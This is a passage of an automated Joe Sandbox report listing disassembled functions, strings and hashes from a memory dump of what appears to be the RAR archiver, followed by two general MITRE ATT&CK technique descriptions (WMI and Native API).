_invalid_parameter_noinfo.LIBCMT ref: 00007FF7CF8E5908

Strings

gfffffff, xrefs: 00007FF7CF8E5B96

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: gfffffff
API String ID: 3215553584-1523873471
Opcode ID: 21452402729b0f04a42bea99b9d48ecd324c6ba459a3d9785fd7d0df1cc262de
Instruction ID: 569a9bc849258d70c32e6398c1af9d0081160fc10ccce213d46172d93464a8ef
Opcode Fuzzy Hash: 21452402729b0f04a42bea99b9d48ecd324c6ba459a3d9785fd7d0df1cc262de
Instruction Fuzzy Hash: 99914766B093C646EB11AF2991813FCBBD5AB61BE0F448131CA8D4B7D5DA3CE121D321

Function 00007FF7CF8BCFCF Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7CF8CB6D0: Sleep.KERNEL32(?,?,?,?,00007FF7CF89CBED,?,00000000,?,00007FF7CF8C7A8C), ref: 00007FF7CF8CB730

new.LIBCMT ref: 00007FF7CF8BCFD9

Strings

rar, xrefs: 00007FF7CF8BD074
rev, xrefs: 00007FF7CF8BD00F

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID: Sleep
String ID: rar$rev
API String ID: 3472027048-2145959568
Opcode ID: 49267c968bf48376f8bb62a9904bbec435c53818402eee37bb5d47bcb8d29714
Instruction ID: e3a29b5a57e8acf63b6e403aa91f1383fd4f08b06707e496e0267142a5667bab
Opcode Fuzzy Hash: 49267c968bf48376f8bb62a9904bbec435c53818402eee37bb5d47bcb8d29714
Instruction Fuzzy Hash: 93A19C23A096D292EA24EF20C8542FDE3E5FB447A4F854071DE5D0B6D6EE2CE565E330

Function 00007FF7CF8DF7CC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 169COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7CF8DF7FE
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7CF8DFA3C

Strings

*, xrefs: 00007FF7CF8DF90C

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: *
API String ID: 3215553584-163128923
Opcode ID: 16a705be2b1e487b59333a8e93db6455a755c474a96de4fc0b7d69b7c81f417b
Instruction ID: 792048986c51b6c6864ea0ff2b06d601f7bb9dfe00ee55ceb6f226e7ad165d41
Opcode Fuzzy Hash: 16a705be2b1e487b59333a8e93db6455a755c474a96de4fc0b7d69b7c81f417b
Instruction Fuzzy Hash: B1715E72D09693A6E764AF2480451BCBBE0FF05F6CFA41137DA4A42298DF29D4A1F731

Function 00007FF7CF8E5CD4 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7CF8E5D17

Strings

gfff, xrefs: 00007FF7CF8E5E42
e+000, xrefs: 00007FF7CF8E5DBF

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: e+000$gfff
API String ID: 3215553584-3030954782
Opcode ID: a7106781bdf1546bde54527bf858c9e03adeffff05cd77f62067aea497a9d42c
Instruction ID: 7648fd30e7afc8ec28ca78a95a56a50911e2b61ebc0b44ff863a079b8e2d04bc
Opcode Fuzzy Hash: a7106781bdf1546bde54527bf858c9e03adeffff05cd77f62067aea497a9d42c
Instruction Fuzzy Hash: 94513866B187C246E7259F3599413E9BBD1EB41BA0F88C231C69C8BBD5CF2CD454D720

Function 00007FF7CF8B4534 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 130COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32(?,?,?,00000800,?,?,00000000,00007FF7CF8A475B,?,00000000,?,?,00007FF7CF8A4620,?,00000000,?), ref: 00007FF7CF8B4633

Strings

\\?\, xrefs: 00007FF7CF8B45B6, 00007FF7CF8B4602, 00007FF7CF8B4684, 00007FF7CF8B46D3
UNC, xrefs: 00007FF7CF8B4614

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID: CurrentDirectory
String ID: UNC$\\?\
API String ID: 1611563598-253988292
Opcode ID: da028c110e4e0ee969c3eaba738cc076e51dd9ec006f0672d54c2a85376dd233
Instruction ID: e3b97518364af39ac562b6c050347df41c59656f002e91d64ba7110e488688da
Opcode Fuzzy Hash: da028c110e4e0ee969c3eaba738cc076e51dd9ec006f0672d54c2a85376dd233
Instruction Fuzzy Hash: 0241A321A086C250FA24BF51EC061F9A3D1AF46BE4FC18131DD6D476D6EE2CE968E230

Function 00007FF7CF8C7C38 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,?,?,00007FF7CF8C7471), ref: 00007FF7CF8C7C96
wcsstr.LIBVCRUNTIME ref: 00007FF7CF8C7CBC

Strings

System Volume Information\, xrefs: 00007FF7CF8C7CB2

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID: AttributesFilewcsstr
String ID: System Volume Information\
API String ID: 1592324571-4227249723
Opcode ID: 4db18abc006475e63bde04fe0f8edb9794334f288998beee5a1eb1867efadb0f
Instruction ID: 9a3908b944e8165898c434f9d41bf5e8b4fa31914be54338c03ab917ba7e6b43
Opcode Fuzzy Hash: 4db18abc006475e63bde04fe0f8edb9794334f288998beee5a1eb1867efadb0f
Instruction Fuzzy Hash: FC31C021A196C245EF55AF21A5506FEA7E0AF45BE0F844130EF4D0779ACE3CE4619730

Function 00007FF7CF894888 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 79COMMON

Download Yara Rule

APIs

swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7CF8948F8

Part of subcall function 00007FF7CF8C49F4: LoadStringW.USER32 ref: 00007FF7CF8C4A7B
Part of subcall function 00007FF7CF8C49F4: LoadStringW.USER32 ref: 00007FF7CF8C4A94

Part of subcall function 00007FF7CF898444: fflush.LIBCMT ref: 00007FF7CF898477

Strings

[, xrefs: 00007FF7CF8948E5
%d.%02d, xrefs: 00007FF7CF8948DE

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID: LoadString$fflushswprintf
String ID: %d.%02d$[
API String ID: 1946543793-195111373
Opcode ID: f04d483f56175c8b40415d20487cbec804232b663c65daca34dce35784760712
Instruction ID: 82af165efc041a8266c5413618ed3f250e68be7703b6c69581b358bd3dfa8e1e
Opcode Fuzzy Hash: f04d483f56175c8b40415d20487cbec804232b663c65daca34dce35784760712
Instruction Fuzzy Hash: AC314D21A096C245FB64BF60E0193F9A3D0AF947A8FC45039D64D0B696DF2CE568D770

Function 00007FF7CF8C3C20 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 73COMMON

Download Yara Rule

APIs

snprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7CF8C3CB0

Strings

@%s, xrefs: 00007FF7CF8C3C94
$%s, xrefs: 00007FF7CF8C3C9D

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID: snprintf
String ID: $%s$@%s
API String ID: 4288800496-834177443
Opcode ID: 7a7053d11aa3be1251aeb62ffc93e7b2ac424df20b613d8193438d5ab2157725
Instruction ID: faf9577b555ce9a49c27438a52635b55ba199687e40c7a0698029477ce66932a
Opcode Fuzzy Hash: 7a7053d11aa3be1251aeb62ffc93e7b2ac424df20b613d8193438d5ab2157725
Instruction Fuzzy Hash: B2319E22B08BC295EB10AF55E4507EDA3A0FB547A4F900032EF0D17B59DE3DE526A730

Function 00007FF7CF8BF474 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 73COMMON

Download Yara Rule

APIs

swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7CF8BF4D2

Strings

fixed%u., xrefs: 00007FF7CF8BF4C6
fixed., xrefs: 00007FF7CF8BF4B8

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID: swprintf
String ID: fixed%u.$fixed.
API String ID: 233258989-2525383582
Opcode ID: fddd7528cb08c65f409e766db47ba8cea55e1086a780a4f54c28e47408ad2848
Instruction ID: 41a944a20f68f6cf99aae928c19b311835e6591a7d7edb2e9fc9fbe80a3f1160
Opcode Fuzzy Hash: fddd7528cb08c65f409e766db47ba8cea55e1086a780a4f54c28e47408ad2848
Instruction Fuzzy Hash: 8731A622A086C252EB10EF65E8013E9A7E0EB457A0FD00232EE5D1769ADE3CD516D730

Function 00007FF7CF8C49F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON

Download Yara Rule

APIs

LoadStringW.USER32 ref: 00007FF7CF8C4A7B
LoadStringW.USER32 ref: 00007FF7CF8C4A94

Strings

Adding %-58s , xrefs: 00007FF7CF8C4A16

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID: LoadString
String ID: Adding %-58s
API String ID: 2948472770-2059140559
Opcode ID: 029dc5b3afc22f1748ed18b4bb1637acba6cd1f0e3e62fcee6acc39158075de8
Instruction ID: 38bdd8782474ebeb28b9754ef95489f6236ef97d4432206352fce10b0ce30aea
Opcode Fuzzy Hash: 029dc5b3afc22f1748ed18b4bb1637acba6cd1f0e3e62fcee6acc39158075de8
Instruction Fuzzy Hash: 20116375B14B8189EB14AF16E8401A4F7E1FB94FE0FA48435CE0C93328DE3CE9568264

Function 00007FF7CF885DB4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON

Download Yara Rule

APIs

swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7CF885E1B
swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7CF885E2F

Strings

;%%0%du, xrefs: 00007FF7CF885E0A

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID: swprintf
String ID: ;%%0%du
API String ID: 233258989-2249936285
Opcode ID: 5630f68361fdad429f81d227d618e3426730f2a1c59dfa690c7e09baebf2de4d
Instruction ID: ea365221d47b90c85a7043414772b6f02c69430921046132aecea256a1b89764
Opcode Fuzzy Hash: 5630f68361fdad429f81d227d618e3426730f2a1c59dfa690c7e09baebf2de4d
Instruction Fuzzy Hash: 1511C822B086C146E720AF24E4103E9B3A0FF88BA8F844031DF4D4779ADE3CD955DB60

Function 00007FF7CF8A331C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7CF8B42CC: swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7CF8B430F

GetVolumeInformationW.KERNEL32(?,00007FF7CF8A0BED,?,?,00000000,?,?,00007FF7CF89F30F,00000000,00007FF7CF886380,?,00007FF7CF882EC8), ref: 00007FF7CF8A337E

Strings

FAT32, xrefs: 00007FF7CF8A339D
FAT, xrefs: 00007FF7CF8A3388

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID: InformationVolumeswprintf
String ID: FAT$FAT32
API String ID: 989755765-1174603449
Opcode ID: b1ebeb30fd722dd76b352bce1e824f537b2a19fc82dbcf7dfb484d1401dd98df
Instruction ID: 2663bf8c078fc285894256aeb9c046836fc9538710061dd82e8800ef9faf38f5
Opcode Fuzzy Hash: b1ebeb30fd722dd76b352bce1e824f537b2a19fc82dbcf7dfb484d1401dd98df
Instruction Fuzzy Hash: F2116021A1CAC245EB60AF50E8812E6A3E0FF84754FD05031EA4D83A9ADF2DE1249B30

Function 00007FF7CF8CB974 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32 ref: 00007FF7CF8CB97B
GetLastError.KERNEL32 ref: 00007FF7CF8CB986

Part of subcall function 00007FF7CF89CA40: _CxxThrowException.LIBVCRUNTIME ref: 00007FF7CF89CEDE

Strings

WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00007FF7CF8CB990

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID: ErrorExceptionLastObjectSingleThrowWait
String ID: WaitForMultipleObjects error %d, GetLastError %d
API String ID: 564652978-2248577382
Opcode ID: 46226563a9827009269dbdda457766bca55c7f33c1314a041e0b52dd23cb2e00
Instruction ID: 42d7540023a26d521686e857ece690a6d8567f2bcac64f3aab840949fff195d4
Opcode Fuzzy Hash: 46226563a9827009269dbdda457766bca55c7f33c1314a041e0b52dd23cb2e00
Instruction Fuzzy Hash: 4CE01A72E088824AEA08BF24BC820F4B2D0AF61774FD05330D03E821E59F2CA566A331

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
